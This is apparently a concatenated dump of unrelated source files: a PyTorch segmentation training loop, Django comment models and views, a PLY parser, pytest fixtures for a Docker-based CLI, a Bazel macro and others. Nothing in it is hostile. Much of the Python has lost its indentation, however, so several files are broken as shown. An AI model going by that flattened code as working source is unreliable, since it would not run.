train_sampler.set_epoch(np.random.randint(cfg.train.max_iters))
train_loader_iter = iter(train_loader)
# loss_mask = get_mask_by_radius(h=cfg.dataset.crop_size, w=cfg.dataset.crop_size, radius=4)
avg_meter = AverageMeter()
# fake_iter_per_epoch = 800
# total_epochs = int(cfg.train.max_iters / fake_iter_per_epoch)
ncrops = 10
DINO_loss = MaskedDINOLoss(out_dim=1024, ncrops=ncrops,).cuda()
for n_iter in range(cfg.train.max_iters):
try:
img_name, inputs, cls_label, img_box, crops = next(train_loader_iter)
        except StopIteration:
train_sampler.set_epoch(np.random.randint(cfg.train.max_iters))
train_loader_iter = iter(train_loader)
img_name, inputs, cls_label, img_box, crops = next(train_loader_iter)
inputs = inputs.to(device, non_blocking=True)
cls_label = cls_label.to(device, non_blocking=True)
_, _, pre_cams = multi_scale_cam2(model, inputs=inputs, scales=cfg.cam.scales)
roi_mask = cam_to_roi_mask2(pre_cams.detach(), cls_label=cls_label, low_thre=cfg.cam.low_thre - 0.1, hig_thre=cfg.cam.high_thre + 0.1)
# roi_mask = cam_to_roi_mask(pre_cams.detach(), cls_label=cls_label, thre=cfg.cam.low_thre - 0.1)
local_crops, crops_flag = crop_from_roi(images=crops[2], roi_mask=roi_mask, crop_num=ncrops-2)
roi_crops = crops[:2] + local_crops
cls, segs, attns, fmap, cls_aux, out_t, out_s = model(inputs, crops=roi_crops, n_iter=n_iter)
cams, tscams, cams_aux = multi_scale_cam2(model, inputs=inputs, scales=cfg.cam.scales)
valid_cam, pseudo_label = cam_to_label(cams.detach(), cls_label=cls_label, img_box=img_box, ignore_mid=True, cfg=cfg)
valid_cam_aux, _ = cam_to_label(cams_aux.detach(), cls_label=cls_label, img_box=img_box, ignore_mid=True, cfg=cfg)
# roi_mask = cam_to_roi_mask(cams.detach(), cls_label=cls_label, thre=cfg.cam.low_thre)
# local_crops, crops_flag = crop_from_roi(images=inputs, roi_mask=roi_mask, crop_num=8)
segs = F.interpolate(segs, size=pseudo_label.shape[1:], mode='bilinear', align_corners=False)
seg_loss = get_seg_loss(segs, pseudo_label.type(torch.long), ignore_index=cfg.dataset.ignore_index)
cls_loss = F.multilabel_soft_margin_loss(cls, cls_label)
cls_loss_aux = F.multilabel_soft_margin_loss(cls_aux, cls_label)
di_loss = DINO_loss(out_s, out_t, crops_flag=crops_flag)
resized_cams_aux = F.interpolate(cams_aux, size=fmap.shape[2:], mode="bilinear", align_corners=False)
_, pseudo_label_aux = cam_to_label(resized_cams_aux.detach(), cls_label=cls_label, img_box=img_box, ignore_mid=True, cfg=cfg)
aff_mask = label_to_aff_mask(pseudo_label_aux)
cos_loss = get_masked_cos_loss(fmap, aff_mask)
# cos_loss = get_cos_loss(fmap, low_fmap)
loss = 1.0 * cls_loss + 0.0 * seg_loss + 1.0 * cls_loss_aux + 0.5 * cos_loss + 0.5 * di_loss
cls_pred = (cls > 0).type(torch.int16)
cls_score = evaluate.multilabel_score(cls_label.cpu().numpy()[0], cls_pred.cpu().numpy()[0])
avg_meter.add({'cls_loss': cls_loss.item(), 'cos_loss': cos_loss.item(), 'dino_loss': di_loss.item(), 'cls_loss_aux': cls_loss_aux.item(), 'cls_score': cls_score.item(),})
optim.zero_grad()
loss.backward()
optim.step()
if (n_iter + 1) % cfg.train.log_iters == 0:
delta, eta = cal_eta(time0, n_iter + 1, cfg.train.max_iters)
cur_lr = optim.param_groups[0]['lr']
preds = torch.argmax(segs, dim=1,).cpu().numpy().astype(np.int16)
gts = pseudo_label.cpu().numpy().astype(np.int16)
seg_mAcc = (preds == gts).sum() / preds.size
grid_imgs, grid_cam = imutils.tensorboard_image(imgs=inputs.clone(), cam=valid_cam)
_, grid_tscam = imutils.tensorboard_image(imgs=inputs.clone(), cam=tscams)
_, grid_cam_aux = imutils.tensorboard_image(imgs=inputs.clone(), cam=valid_cam_aux)
_attns_detach = [a.detach() for a in attns]
# grid_attns = imutils.tensorboard_attn2(attns=_attns_detach, n_row=cfg.train.samples_per_gpu, with_attn_pred=False)
grid_attn_cls_mhsa, grid_attn_cls_mean = imutils.tensorboard_cls_token_attn(_attns_detach)
grid_labels = imutils.tensorboard_label(labels=gts)
grid_preds = imutils.tensorboard_label(labels=preds)
if args.local_rank == 0:
logging.info("Iter: %d; Elasped: %s; ETA: %s; LR: %.3e; cls_loss: %.4f, cls_loss_aux: %.4f, cos_loss %.4f, dino_loss %.4f" % (n_iter + 1, delta, eta, cur_lr, avg_meter.pop('cls_loss'), avg_meter.pop('cls_loss_aux'), avg_meter.pop('cos_loss'), avg_meter.pop('dino_loss')))
writer.add_image("train/images", grid_imgs, global_step=n_iter)
writer.add_image("train/preds", grid_preds, global_step=n_iter)
writer.add_image("train/pseudo_gts", grid_labels, global_step=n_iter)
writer.add_image("cam/valid_cams", grid_cam, global_step=n_iter)
writer.add_image("cam/valid_cams_aux", grid_cam_aux, global_step=n_iter)
writer.add_image("cam/valid_tscams", grid_tscam, global_step=n_iter)
writer.add_image("attns/cls_token_mean_per_layer", grid_attn_cls_mean, global_step=n_iter)
writer.add_image("attns/cls_token_multi-head_last_layer", grid_attn_cls_mhsa, global_step=n_iter)
writer.add_scalars('loss', {"seg_loss": seg_loss.item(), "cls_loss": cls_loss.item()}, global_step=n_iter)
writer.add_scalars('learning_rate', {"learning_rate": optim.param_groups[0]["lr"], }, global_step=n_iter)
if (n_iter + 1) % cfg.train.eval_iters == 0:
ckpt_name = os.path.join(cfg.work_dir.ckpt_dir, "model_iter_%d.pth" % (n_iter + 1))
if args.local_rank == 0:
logging.info('Validating...')
torch.save(model.state_dict(), ckpt_name)
val_cls_score, tab_results = validate(model=model, data_loader=val_loader, cfg=cfg)
if args.local_rank == 0:
logging.info("val cls score: %.6f" % (val_cls_score))
logging.info("\n"+tab_results)
writer.add_scalars('cls_score', {"val": val_cls_score, "train": avg_meter.pop('cls_score')}, global_step=n_iter)
return True
if __name__ == "__main__":
args = parser.parse_args()
cfg = OmegaConf.load(args.config)
if args.work_dir is not None:
cfg.work_dir.dir = args.work_dir
if args.crop_size is not None:
cfg.dataset.crop_size = args.crop_size
timestamp = "{0:%Y-%m-%d-%H-%M-%S}".format(datetime.datetime.now())
cfg.work_dir.dir = os.path.join(cfg.work_dir.dir, timestamp)
cfg.work_dir.ckpt_dir = os.path.join(cfg.work_dir.dir, cfg.work_dir.ckpt_dir)
cfg.work_dir.pred_dir = os.path.join(cfg.work_dir.dir, cfg.work_dir.pred_dir)
cfg.work_dir.tb_logger_dir = os.path.join(cfg.work_dir.dir, cfg.work_dir.tb_logger_dir)
os.makedirs(cfg.work_dir.ckpt_dir, exist_ok=True)
os.makedirs(cfg.work_dir.pred_dir, exist_ok=True)
os.makedirs(cfg.work_dir.tb_logger_dir, exist_ok=True)
if args.local_rank == 0:
setup_logger(filename=os.path.join(cfg.work_dir.dir, 'train.log'))
logging.info('Pytorch version: %s' % torch.__version__)
logging.info("GPU type: %s"%(torch.cuda.get_device_name(0)))
logging.info('\nargs: %s' % args)
with open(os.path.join(cfg.work_dir.dir, 'config.yaml'), 'w') as f:
OmegaConf.save(cfg, f.name)
## fix random seed
setup_seed(1)
train(cfg=cfg)
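# --- Hedged usage note (added; the launch command below is an assumption) ---
# Because the script consumes --local_rank and calls dist.init_process_group(),
# it is presumably launched through torch.distributed, e.g. something like:
#
#   python -m torch.distributed.launch --nproc_per_node=2 \
#       <this_script>.py --config configs/voc.yaml --work_dir work_dirs/voc
#
# --work_dir and --crop_size are optional overrides handled in the __main__
# block above; the GPU count and work_dir path here are illustrative only.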
|
py | b4033d527f829c208efc0df31cc3d44d86c30c72 | import torch
import torch.nn as nn
class PositionalEncodingLayer(nn.Module):
def __init__(self, d_model, max_len=50):
super(PositionalEncodingLayer, self).__init__()
self.d_model = d_model
self.max_len = max_len
def get_angles(self, positions, indexes):
d_model_tensor = torch.FloatTensor([[self.d_model]]).to(positions.device)
angle_rates = torch.pow(10000, (2 * (indexes // 2)) / d_model_tensor)
return positions / angle_rates
def forward(self, input_sequences):
"""
:param Tensor[batch_size, seq_len] input_sequences
:return Tensor[batch_size, seq_len, d_model] position_encoding
"""
positions = torch.arange(input_sequences.size(1)).unsqueeze(1).to(input_sequences.device) # [seq_len, 1]
indexes = torch.arange(self.d_model).unsqueeze(0).to(input_sequences.device) # [1, d_model]
angles = self.get_angles(positions, indexes) # [seq_len, d_model]
angles[:, 0::2] = torch.sin(angles[:, 0::2]) # apply sin to even indices in the tensor; 2i
        angles[:, 1::2] = torch.cos(angles[:, 1::2]) # apply cos to odd indices in the tensor; 2i+1
position_encoding = angles.unsqueeze(0).repeat(input_sequences.size(0), 1, 1) # [batch_size, seq_len, d_model]
return position_encoding |
py | b4033d689f02bf618ca16ef50b35ce9fe45f7a68 | # Licensed under a 3-clause BSD style license - see LICENSE.rst
"""Gammapy command line and GUI tools.
"""
from .check import *
from .info import *
from .data_browser import *
from .data_manage import *
from .data_select import *
from .data_show import *
from .spectrum_regions import *
from .image_bin import *
from .image_coordinates import *
#from .image_lima import *
from .image_fit import *
from .image_lookup import *
from .image_model import *
from .image_model_sherpa import *
from .image_pipe import *
from .image_ts import *
from .cube_background import *
from .cube_bin import *
from .detect import *
from .detect_iterative import *
from .catalog_browser import *
# from .catalog_query import *
from .cta_irf import CTAIrf
|
py | b4033d78a79fbc97dfcaebb317c390d79e288782 | import maya.OpenMayaUI as apiUI
from fxpt.qt.pyside import QtWidgets, shiboken2
from fxpt.fx_texture_manager import main_window
mainWin = None
def getMayaMainWindowPtr():
ptr = apiUI.MQtUtil.mainWindow()
if not ptr:
raise RuntimeError('Cannot find Maya main window.')
else:
return ptr
def getMayaQMainWindow(ptr):
return shiboken2.wrapInstance(long(ptr), QtWidgets.QMainWindow)
def run():
global mainWin
if not mainWin:
mayaMainWin = getMayaQMainWindow(getMayaMainWindowPtr())
mainWin = main_window.TexManagerUI(mayaMainWin)
mainWin.show()
mainWin.raise_()
|
bzl | b4033df7e1ec9ad326b64a9bb54f4eb5fd194730 | load("@io_bazel_rules_docker//container:container.bzl", "container_layer")
def user_layer(name, id, user, home, shell = "/usr/sbin/nologin"):
native.genrule(
name = "user_" + id + "_" + name,
srcs = ["@containers_by_bazel//macros/user:files/passwd"],
outs = ["passwd"],
cmd = "$(location @containers_by_bazel//macros/user:add_user) $< '" + id + "' '" + user + "' '" + home + "' '" + shell + "' > $@",
tools = ["@containers_by_bazel//macros/user:add_user"],
)
native.genrule(
name = "group_" + id + "_" + name,
srcs = ["@containers_by_bazel//macros/user:files/group"],
outs = ["group"],
cmd = "$(location @containers_by_bazel//macros/user:add_group) $< '" + id + "' '" + user + "' > $@",
tools = ["@containers_by_bazel//macros/user:add_group"],
)
container_layer(
name = name,
files = [
"user_" + id + "_" + name,
"group_" + id + "_" + name,
],
directory = "/etc",
)
|
py | b4033e2c0937fb996fd4c57252397671e031f708 | import pytest
import json
from copy import copy
from os import remove, environ, mkdir
from os.path import abspath, dirname, isfile, isdir
from shutil import rmtree
from distutils.spawn import find_executable as which
from typing import Dict
from floopcli.config import _FLOOP_CONFIG_DEFAULT_CONFIGURATION
from floopcli.util.syscall import syscall
FLOOP_TEST_CONFIG_FILE = './floop.json'
FLOOP_TEST_CONFIG = _FLOOP_CONFIG_DEFAULT_CONFIGURATION
# you need to pass FLOOP_CLOUD_CORES as an env variable
_TEST_FLOOP_CLOUD_CORES = environ.get('FLOOP_CLOUD_CORES')
_TEST_CORE_NAME = 'core0'
if _TEST_FLOOP_CLOUD_CORES is not None:
# you need to pass FLOOP_CLOUD_CORES as an env variable
_TEST_CORE_NAME = _TEST_FLOOP_CLOUD_CORES.split(':')[0]
_DEVICE_TEST_SRC_DIRECTORY = '{}/src/'.format(dirname(
abspath(__file__))
)
@pytest.fixture(scope='module')
def fixture_docker_machine_bin(): # type: () -> str
return which('docker-machine')
@pytest.fixture(scope='module')
def fixture_rsync_bin(): # type: () -> str
return which('rsync')
@pytest.fixture(scope='function')
def fixture_default_config_file(request): # type: (pytest.FixtureRequest) -> str
config_file = FLOOP_TEST_CONFIG_FILE
config = FLOOP_TEST_CONFIG
def cleanup():
if isfile(config_file):
remove(config_file)
cleanup()
with open(config_file, 'w') as cf:
json.dump(config, cf)
request.addfinalizer(cleanup)
return config_file
# keep these fixtures separate to allow for fine-grained
# refactoring using different env variables
@pytest.fixture(autouse=True)
def fixture_valid_docker_machine(): # type: () -> None
if environ.get('FLOOP_LOCAL_HARDWARE_TEST'):
pass
elif environ.get('FLOOP_CLOUD_TEST'):
pass
# default to local 1GB Virtualbox machine
else:
create_local_machine = '''docker-machine create
--driver virtualbox
--virtualbox-memory 1024
{}'''.format(_TEST_CORE_NAME)
syscall(create_local_machine, check=False)
@pytest.fixture(scope='function')
def fixture_valid_target_directory(): # type: () -> str
if environ.get('FLOOP_LOCAL_HARDWARE_TEST'):
return ''
elif environ.get('FLOOP_CLOUD_TEST'):
return '/home/ubuntu/floop'
else:
return '/home/floop/floop'
@pytest.fixture(scope='function')
def fixture_valid_core_config(request): # type: (pytest.FixtureRequest) -> Dict[str, str]
if environ.get('FLOOP_LOCAL_HARDWARE_TEST'):
return {}
elif environ.get('FLOOP_CLOUD_TEST'):
return {'address' : '192.168.1.100',
'port' : '22',
'target_source' : fixture_valid_target_directory(),
'group' : 'group0',
'host_docker_machine_bin' : fixture_docker_machine_bin(),
'host_key' : '~/.ssh/id_rsa',
'build_file' : 'Dockerfile',
'test_file' : 'Dockerfile.test',
'privileged' : True,
'host_network' : True,
'docker_socket' : '/var/run/docker.sock',
'hardware_devices' : ['/dev/i2c-0'],
'host_rsync_bin' : fixture_rsync_bin(),
'host_source' : fixture_valid_src_directory(request),
'core' : _TEST_CORE_NAME,
'user' : 'floop'}
else:
return {'address' : '192.168.1.100',
'port' : '22',
'target_source' : fixture_valid_target_directory(),
'group' : 'group0',
'host_docker_machine_bin' : fixture_docker_machine_bin(),
'host_key' : '~/.ssh/id_rsa',
'build_file' : 'Dockerfile',
'test_file' : 'Dockerfile.test',
'privileged' : True,
'host_network' : True,
'docker_socket' : '/var/run/docker.sock',
'hardware_devices' : ['/dev/i2c-0'],
'host_rsync_bin' : fixture_rsync_bin(),
'host_source' : fixture_valid_src_directory(request),
'core' : _TEST_CORE_NAME,
'user' : 'floop'}
@pytest.fixture(scope='function')
def fixture_invalid_core_core_config(request): # type: (pytest.FixtureRequest) -> Dict[str, str]
config = fixture_valid_core_config(request)
config['core'] = 'thisshouldfail'
return config
@pytest.fixture(scope='function')
def fixture_valid_config_file(request): # type: (pytest.FixtureRequest) -> str
if environ.get('FLOOP_LOCAL_HARDWARE_TEST'):
return ''
elif environ.get('FLOOP_CLOUD_TEST') is not None:
cloud_cores = environ['FLOOP_CLOUD_CORES'].split(':')
src_dir = fixture_valid_src_directory(request)
config_file = fixture_default_config_file(request)
with open(config_file, 'r') as cf:
data = json.load(cf)
data['groups']['group0']['cores']['default']['host_source'] = src_dir
del data['groups']['group0']['cores']['core0']
for idx, core in enumerate(cloud_cores):
data['groups']['group0']['cores'][core] = {
'address' : '192.168.1.' + str(idx),
'port' : '22',
'target_source' : '/home/ubuntu/floop',
'user' : 'floop',
'host_key' : '~/.ssh/id_rsa'
}
with open(config_file, 'w') as cf:
json.dump(data, cf)
return config_file
else:
src_dir = fixture_valid_src_directory(request)
config_file = fixture_default_config_file(request)
with open(config_file, 'r') as cf:
data = json.load(cf)
data['groups']['group0']['cores']['default']['host_source'] = src_dir
with open(config_file, 'w') as cf:
json.dump(data, cf)
return config_file
#
#
@pytest.fixture(scope='function')
def fixture_malformed_config_file(request): # type: (pytest.FixtureRequest) -> str
config_file = fixture_valid_config_file(request)
with open(config_file, 'r') as cf:
data = json.load(cf)
data['groups'] = {}
with open(config_file, 'w') as cf:
json.dump(data, cf)
return config_file
@pytest.fixture(scope='function')
def fixture_invalid_core_config_file(request): # type: (pytest.FixtureRequest) -> str
config_file = fixture_valid_config_file(request)
with open(config_file, 'r') as cf:
data = json.load(cf)
cores = data['groups']['group0']['cores'].keys()
core = [c for c in cores if c != 'default'][0]
core_config = data['groups']['group0']['cores'][core]
for c in list(cores):
if c != 'default':
del data['groups']['group0']['cores'][c]
data['groups']['group0']['cores']['thisshouldnotwork'] = core_config
with open(config_file, 'w') as cf:
json.dump(data, cf)
return config_file
@pytest.fixture(scope='function')
def fixture_incomplete_config_file(request): # type: (pytest.FixtureRequest) -> str
config_file = fixture_valid_config_file(request)
with open(config_file, 'r') as cf:
data = json.load(cf)
data['groups'] = {
'default' : {},
'group0' : {
'cores' : {
'default' : {},
'core0' : {},
}
}
}
with open(config_file, 'w') as cf:
json.dump(data, cf)
return config_file
@pytest.fixture(scope='function')
def fixture_valid_src_directory(request): # type: (pytest.FixtureRequest) -> str
src_dir = _DEVICE_TEST_SRC_DIRECTORY
if isdir(src_dir):
rmtree(src_dir)
mkdir(src_dir)
def cleanup(): # type: () -> None
if isdir(src_dir):
rmtree(src_dir)
request.addfinalizer(cleanup)
return src_dir
@pytest.fixture(scope='function')
def fixture_buildfile(request): # type: (pytest.FixtureRequest) -> str
src_dir = fixture_valid_src_directory(request)
buildfile = '{}/Dockerfile'.format(_DEVICE_TEST_SRC_DIRECTORY)
buildfile_contents = '''FROM busybox:latest
RUN sh'''
with open(buildfile, 'w') as bf:
bf.write(buildfile_contents)
return src_dir
@pytest.fixture(scope='function')
def fixture_failing_buildfile(request): # type: (pytest.FixtureRequest) -> str
src_dir = fixture_valid_src_directory(request)
buildfile = '{}/Dockerfile'.format(_DEVICE_TEST_SRC_DIRECTORY)
buildfile_contents = '''FROM busybox:latest
RUN cp'''
with open(buildfile, 'w') as bf:
bf.write(buildfile_contents)
return src_dir
@pytest.fixture(scope='function')
def fixture_failing_runfile(request): # type: (pytest.FixtureRequest) -> str
src_dir = fixture_valid_src_directory(request)
buildfile = '{}/Dockerfile'.format(_DEVICE_TEST_SRC_DIRECTORY)
buildfile_contents = '''FROM busybox:latest
CMD ["apt-get", "update"]'''
with open(buildfile, 'w') as bf:
bf.write(buildfile_contents)
return src_dir
@pytest.fixture(scope='function')
def fixture_testfile(request): # type: (pytest.FixtureRequest) -> str
src_dir = fixture_valid_src_directory(request)
testfile = '{}/Dockerfile.test'.format(_DEVICE_TEST_SRC_DIRECTORY)
testfile_contents = '''FROM busybox:latest
run sh'''
with open(testfile, 'w') as tf:
tf.write(testfile_contents)
return src_dir
@pytest.fixture(scope='function')
def fixture_failing_testfile(request): # type: (pytest.FixtureRequest) -> str
src_dir = fixture_valid_src_directory(request)
buildfile = '{}/Dockerfile.test'.format(_DEVICE_TEST_SRC_DIRECTORY)
buildfile_contents = '''FROM busybox:latest
CMD ["apt-get", "update"]'''
with open(buildfile, 'w') as tf:
tf.write(buildfile_contents)
return src_dir
@pytest.fixture(scope='function')
def fixture_redundant_config_file(request): # type: (pytest.FixtureRequest) -> str
config_file = fixture_valid_config_file(request)
with open(config_file, 'r') as cf:
data = json.load(cf)
core = [k for k in data['groups']['group0']['cores'].keys() if k != 'default'][0]
core_config = data['groups']['group0']['cores'][core]
default_config = data['groups']['group0']['cores']['default']
data['groups']['group0']['cores'] = {
'default' : default_config,
'core0' : core_config, 'core1' : core_config}
with open(config_file, 'w') as cf:
json.dump(data, cf)
return config_file
@pytest.fixture(scope='function')
def fixture_missing_property_config_file(request): # type: (pytest.FixtureRequest) -> str
config_file = fixture_valid_config_file(request)
with open(config_file, 'r') as cf:
data = json.load(cf)
core_config = data['groups']['group0']['cores'][_TEST_CORE_NAME]
del core_config['user']
default_config = data['groups']['group0']['cores']['default']
data['groups']['group0']['cores'] = {
'default' : default_config,
_TEST_CORE_NAME : core_config}
with open(config_file, 'w') as cf:
json.dump(data, cf)
return config_file
@pytest.fixture(scope='function')
def fixture_nonexistent_source_dir_config(request): # type: (pytest.FixtureRequest) -> str
test_config = fixture_valid_core_config(request)
test_config['host_source'] = \
'definitely/not/a/real/directory/'
return test_config
@pytest.fixture(scope='function')
def fixture_nonexistent_source_dir_cli_config_file(request): # type: (pytest.FixtureRequest) -> str
config_file = fixture_valid_config_file(request)
with open(config_file, 'r') as cf:
data = json.load(cf)
data['groups']['group0']['cores']['default']['host_source'] =\
'definitely/not/a/real/src/dir/'
with open(config_file, 'w') as cf:
json.dump(data, cf)
return config_file
@pytest.fixture(scope='function')
def fixture_protected_target_directory_config(request): # type: (pytest.FixtureRequest) -> str
test_config = fixture_valid_core_config(request)
test_config['target_source'] = '/.test/'
return test_config
@pytest.fixture(scope='function')
def fixture_docker_machine_wrapper(request): # type: ignore
def wrapper(): # type: () -> None
fixture_valid_docker_machine()
return wrapper
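# --- Hedged example (added; not part of the original conftest) ---
# A minimal sketch of how the config-file fixtures above can be consumed from a
# test module; the assertion mirrors the 'groups' structure that the other
# fixtures read and rewrite.
def test_default_config_file_has_groups(fixture_default_config_file): # type: (str) -> None
    with open(fixture_default_config_file) as cf:
        data = json.load(cf)
    assert 'groups' in data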
|
py | b4033e45a9d89772bdfe7b14848c4c10e27e7e07 | # -----------------------------------------------------------------------------
# Moisés Fernández Zárate A01197049
# littleducklex.py
#
# Little Duck Language 2020 parser with python using PLY (Python Lex Yacc).
# -----------------------------------------------------------------------------
import sys
import ply.yacc as yacc
from littleducklex import tokens
# Programa
def p_programa(p):
'''
programa : PROGRAM ID SEMICOLON vars bloque
| PROGRAM ID SEMICOLON bloque
'''
p[0] = "PROGRAM COMPILED SUCCESFULLY."
# Vars
def p_vars(p):
'''
vars : VARS varArgs
'''
def p_varArgs(p):
'''
varArgs : ID COLON tipo SEMICOLON
            | ID COLON tipo SEMICOLON varArgs
| ID COMMA varArgs
'''
# Var tipo
def p_tipo(p):
'''
tipo : INT
| FLOAT
'''
# Bloque
def p_bloque(p):
'''
bloque : LBRACE estatutos RBRACE
'''
# Estatutos
def p_estatutos(p):
'''
estatutos : estatuto
| estatuto estatutos
| empty
'''
# Estatuto
def p_estatuto(p):
'''
estatuto : asignacion
| condicion
| escritura
'''
# Asignacion
def p_asignacion(p):
'''
asignacion : ID EQUAL expresion SEMICOLON
'''
# Expresion
def p_expresion(p):
'''
expresion : exp expresionP
'''
def p_expresionP(p):
'''
expresionP : LESS exp
| GREATER exp
| DIFFERENT exp
| empty
'''
# Exp
def p_exp(p):
'''
exp : termino expP
'''
def p_expP(p):
'''
expP : PLUS termino expP
| MINUS termino expP
| empty
'''
# Término
def p_termino(p):
'''
termino : factor terminoP
'''
def p_terminoP(p):
'''
terminoP : MULT factor terminoP
| DIV factor terminoP
| empty
'''
# Escritura
def p_escritura(p):
'''
escritura : PRINT LPAREN escrituraP RPAREN SEMICOLON
'''
def p_escrituraP(p):
'''
escrituraP : expresion
| expresion COMMA escrituraP
| CTES
| CTES COMMA escrituraP
'''
# Condicion
def p_condicion(p):
'''
condicion : condicionP bloque SEMICOLON
| condicionP bloque ELSE bloque SEMICOLON
'''
def p_condicionP(p):
'''
condicionP : IF LPAREN expresion RPAREN
'''
# Factor
def p_factor(p):
'''
factor : LPAREN expresion RPAREN
| factorP
'''
def p_factorP(p):
'''
factorP : PLUS varcte
| MINUS varcte
| varcte
'''
# VARCTE
def p_varcte(p):
'''
varcte : ID
| CTEI
| CTEF
'''
def p_empty(p):
'''
empty :
'''
# Error rule for syntax errors
def p_error(p):
print("ERROR {}".format(p))
# Build the parser
yacc.yacc()
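# --- Hedged example input (added for illustration) ---
# A small source text the grammar above should accept; keyword spelling and
# case depend on the token definitions in littleducklex, which are not shown
# here, so treat the exact lexemes as assumptions.
_EXAMPLE_PROGRAM = '''
program demo;
vars x : int;
{
    x = 3 + 4 * 2;
    if (x > 5) {
        print(x);
    };
}
'''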
if __name__ == '__main__':
try:
arch_name = 'prueba2.txt'
arch = open(arch_name,'r')
print("Nombre de archivo a leer: " + arch_name)
info = arch.read()
# print(info)
arch.close()
        if(yacc.parse(info, tracking = True) == 'PROGRAM COMPILED SUCCESSFULLY.'):
print("Correct syntax.")
else:
print("Syntax error.")
except EOFError:
print(EOFError) |
py | b4033f08f3c39584bcc0bbd54828149aacf12d3a | from ._version import get_versions
__version__ = get_versions()['version']
del get_versions
__version_info__ = tuple(__version__.split("."))
|
py | b4033f913d8060afdcba8884ed7a0362d40a0c59 | from django.db import models
from django.template.defaultfilters import slugify
from users.models import CustomUser
STATUS_CHOICES = (('FMC', 'FMC'), ('PMC', 'PMC'), ('NMC', 'NMC'), ('ASI', 'ASI'),)
PRIORITY_CHOICES = (('High', 'High'), ('Normal', 'Normal'), ('Low', 'Low'),)
class Unit(models.Model):
title = models.CharField(max_length=50, unique=True)
location = models.CharField(max_length=50)
favorites = models.ManyToManyField("self", blank=True)
users = models.ManyToManyField(CustomUser)
slug = models.SlugField(default='')
def __str__(self):
return self.title
def save(self, *args, **kwargs):
if not self.id:
self.slug = slugify(self.title)
super(Unit, self).save(*args, **kwargs)
class ContactInfo(models.Model):
poc = models.CharField(max_length=50)
phone = models.CharField(max_length=10)
email = models.EmailField()
unit = models.OneToOneField(Unit, on_delete=models.CASCADE, related_name='contact_info')
def __str__(self):
return self.poc
class Message(models.Model):
subject = models.CharField(max_length=50)
priority = models.CharField(choices=PRIORITY_CHOICES, max_length=10, default='Normal')
created_at = models.DateTimeField(auto_now_add=True)
body = models.TextField(max_length=1000)
unit = models.ForeignKey(Unit, on_delete=models.CASCADE, related_name='messages')
class Meta:
ordering = ['-created_at']
def __str__(self):
return self.subject
class NetworkBoard(models.Model):
overall_status = models.CharField(choices=STATUS_CHOICES, max_length=3)
updated_at = models.DateTimeField(auto_now=True)
unit = models.OneToOneField(Unit, on_delete=models.CASCADE, related_name='network_board')
def __str__(self):
return "{}: {}".format(self.unit, self.overall_status)
class Service(models.Model):
name = models.CharField(max_length=50)
status = models.CharField(choices=STATUS_CHOICES, max_length=3)
more_info = models.TextField(max_length=500, blank=True)
network_board = models.ForeignKey(NetworkBoard, on_delete=models.CASCADE, related_name='services')
def __str__(self):
return self.name
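# --- Hedged usage sketch (added; the field values are illustrative) ---
# The slug is derived from the title on the first save(), as implemented in
# Unit.save() above. Wrapped in a helper so nothing runs at import time.
def _example_create_unit():
    unit = Unit.objects.create(title="1st Signal Battalion", location="Fort Example")
    # slugify("1st Signal Battalion") -> "1st-signal-battalion"
    return unit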
|
py | b4033fdc90196af9ad74d746190250090f4656e1 | from rest_framework.views import APIView
from rest_framework import generics,status
from rest_framework.pagination import PageNumberPagination
from rest_framework.permissions import IsAuthenticated,IsAdminUser
from rest_framework.response import Response
from rest_framework.decorators import api_view
from django.shortcuts import get_object_or_404
from django_redis import get_redis_connection
from .serializers import CommentSerializer
from .models import Comment
from notes.models import Article
# Create your views here.
class CommentPagination(PageNumberPagination):
page_size = 6
page_query_param = 'page'
max_page_size = 10
page_size_query_param = 'page_size'
class CommentItemView(APIView):
# permission_classes = [IsAuthenticated, ]
def get(self, request, comment_id, format=None):
comment = get_object_or_404(Comment, id=comment_id)
serializer = CommentSerializer(comment, context={'request': request})
return Response(serializer.data)
class ArticleCommentsRootView(APIView):
def get(self, request, article_id, format=None):
article = get_object_or_404(Article, id=article_id)
comments = Comment.objects.filter(article=article, parent=None)
count = Comment.objects.filter(article=article).count()
serializer = CommentSerializer(comments, many=True, context={'request':request})
return Response({
'root': serializer.data,
'count': count
})
class ArticleCommentsChildrenView(APIView):
def __init__(self):
super(ArticleCommentsChildrenView,self).__init__()
self.children = []
def children_mapper(self, root, request):
if root and root['children'] != []:
for child_id in list(root['children']):
child = get_object_or_404(Comment, id=child_id)
self.children.append(child)
child_serializer = CommentSerializer(child, context={'request': request})
self.children_mapper(dict(child_serializer.data), request)
def get(self, request, parent_comment_id, format=None):
parent = get_object_or_404(Comment, id=parent_comment_id)
parent_serializer = CommentSerializer(parent, context={'request': request})
self.children_mapper(dict(parent_serializer.data), request)
serializer = CommentSerializer(self.children, many=True, context={'request': request})
return Response(serializer.data)
class CommentsListView(generics.ListAPIView):
serializer_class = CommentSerializer
pagination_class = CommentPagination
permission_classes = [IsAdminUser,]
def get_queryset(self):
return Comment.objects.filter(parent=None)
class CommentCreateView(generics.CreateAPIView):
serializer_class = CommentSerializer
pagination_class = CommentPagination
permission_classes = [IsAuthenticated, ]
def create(self, request, *args, **kwargs):
serializer = self.get_serializer(data=request.data, context={**kwargs, 'request': request})
serializer.is_valid(raise_exception=True)
self.perform_create(serializer)
headers = self.get_success_headers(serializer.data)
return Response(serializer.data, status=status.HTTP_201_CREATED, headers=headers)
class CommentDelView(APIView):
def get(self, request, comment_id, format=None):
comment = get_object_or_404(Comment, id=comment_id)
if request.user != comment.user:
return Response({
                'message': 'Not the comment author!'
}, status=status.HTTP_400_BAD_REQUEST)
comment.delete()
return Response({'message': 'OK'})
@api_view()
def comment_up(request, comment_id):
comment = get_object_or_404(Comment, id=comment_id)
user = request.user
redis_conn = get_redis_connection('session')
    flag = redis_conn.get('lik_cmt_%d_user_%d' % (comment_id, user.id))
if flag is None:
        # not liked yet: add a like
comment.likes += 1
comment.save()
redis_conn.set('lik_cmt_%d_user_%d' % (comment_id, user.id), '1')
return Response({'message': 'OK', 'likes': comment.likes})
else:
        # already liked: remove the like
comment.likes -= 1
comment.save()
redis_conn.delete('lik_cmt_%d_user_%d' % (comment_id, user.id))
return Response({'message': 'enable', 'likes': comment.likes})
@api_view()
def check_comment_up(request, comment_id):
redis_conn = get_redis_connection('session')
comment = get_object_or_404(Comment, id=comment_id)
flag = redis_conn.get('lik_cmt_%d_user_%d' % (comment_id, request.user.id))
if flag is None:
return Response({'message': 'no', 'likes': comment.likes})
else:
return Response({'message': 'yes', 'likes': comment.likes})
@api_view()
def get_article_comments_count(request, article_id):
article = get_object_or_404(Article, id=article_id)
return Response({
"count": article.comments.count(),
"code": 200,
})
|
